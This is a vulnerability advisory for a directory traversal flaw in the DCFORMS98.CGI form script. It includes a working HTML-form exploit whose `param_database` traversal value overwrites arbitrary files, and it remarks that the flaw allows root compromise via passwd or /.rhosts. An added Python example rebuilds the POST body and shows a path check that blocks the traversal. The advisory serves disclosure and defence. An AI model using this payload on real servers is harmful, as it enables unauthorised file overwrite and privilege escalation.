suid@suid.kg - mini advisory - DCFORMS98.CGI 

Software: 	DCFORMS98.CGI 
Vendor:		dcscripts.com
URL:		http://www.dcscripts.com/dcforms98.shtml	
Version:	Version 1.0
Platforms:	Unix
Type:		Input validation problem

Summary:

	Anyone who can reach the CGI can create or truncate any file
	that the web server user (nobody/apache/whatever) can write to.

Vulnerability:

	The Perl code does no input validation, so directory traversal
	(`../` sequences) is possible in the value given for `param_database`,
	which the script uses as the name of the file it writes to.

Exploit:

	Build a HTML form resembling:

	<form action=/cgi-bin/dcforms98.cgi method=post>
	<INPUT TYPE="hidden" name="param_recipient" value="non@existant">
	<INPUT TYPE="hidden" name="param_subject" value="X">
	<INPUT TYPE="hidden" name="param_env_report" value="">
	<INPUT TYPE="hidden" name="param_order" value="Name">

	<!-- This is obviously the problem -->
	<INPUT TYPE="hidden" name="param_database"
		value="../../../../../../../../../../tmp/xxx">


	<INPUT TYPE="hidden" name="param_required" value="Name">
	<INPUT TYPE="hidden" name="param_redirect_url" value="">
	<input type=hidden name=Name value=blah>
	<input type=submit>
	</form>

	If httpd is running as root (UID 0), this is a straight root
	compromise, e.g. by writing entries into the passwd file or /.rhosts.

	Of course you could simply send the same POST request directly
	to the web server; the HTML form is only a convenience.
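	Added example (not part of the original advisory, and not code from
	dcscripts.com): the form above as the raw POST body it produces, next to
	the input check the script is missing. The data directory DATA_DIR, and
	the assumption that the script simply joins it with `param_database`
	before opening the file, are hypothetical; the advisory does not state
	where the script keeps its database files.

```python
"""Added example; not the advisory's or dcscripts.com's own code.

Shows (1) the POST body equivalent to the HTML form in the advisory and
(2) the missing check: `param_database` must be a bare file name that
resolves inside the script's data directory.
"""
import posixpath
from typing import Optional
from urllib.parse import urlencode

# Hypothetical data directory for the script (assumption, not from the advisory).
DATA_DIR = "/usr/local/apache/cgi-bin/dcforms98/data"

# The traversal value from the advisory's form.
TRAVERSAL = "../../../../../../../../../../tmp/xxx"


def build_post_body(database: str, extra: Optional[dict] = None) -> str:
    """Return the application/x-www-form-urlencoded body the form would send."""
    params = {
        "param_recipient": "non@existant",
        "param_subject": "X",
        "param_env_report": "",
        "param_order": "Name",
        "param_database": database,
        "param_required": "Name",
        "param_redirect_url": "",
        "Name": "blah",
    }
    if extra:
        params.update(extra)
    return urlencode(params)


def unchecked_path(database: str) -> str:
    """What an unvalidated join does: the '../' run walks out of DATA_DIR."""
    return posixpath.normpath(posixpath.join(DATA_DIR, database))


def checked_path(database: str) -> Optional[str]:
    """Hardened lookup: only a plain file name that stays inside DATA_DIR.

    Returns the resolved path, or None if the value must be rejected.
    """
    # Reject empty names, any path separator, and NUL (which can truncate
    # the file name in C-backed open() calls).
    if not database or "/" in database or "\\" in database or "\0" in database:
        return None
    # Reject '.', '..' and dot-files.
    if database.startswith("."):
        return None
    resolved = posixpath.normpath(posixpath.join(DATA_DIR, database))
    # Belt and braces: the resolved path must still sit under DATA_DIR.
    if posixpath.commonpath([DATA_DIR, resolved]) != DATA_DIR:
        return None
    return resolved


if __name__ == "__main__":
    print("POST body:", build_post_body(TRAVERSAL))
    print("unchecked:", unchecked_path(TRAVERSAL))        # /tmp/xxx
    print("checked  :", checked_path(TRAVERSAL))          # None
    print("checked  :", checked_path("guestbook.db"))     # inside DATA_DIR
```

	Note that `unchecked_path` lands on /tmp/xxx no matter how deep DATA_DIR
	is, because `normpath` drops `..` components that climb past `/`; that is
	why the advisory's payload uses more `../` than any real data directory
	would need.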

http://www.suid.edu/advisories/005.txt

EOF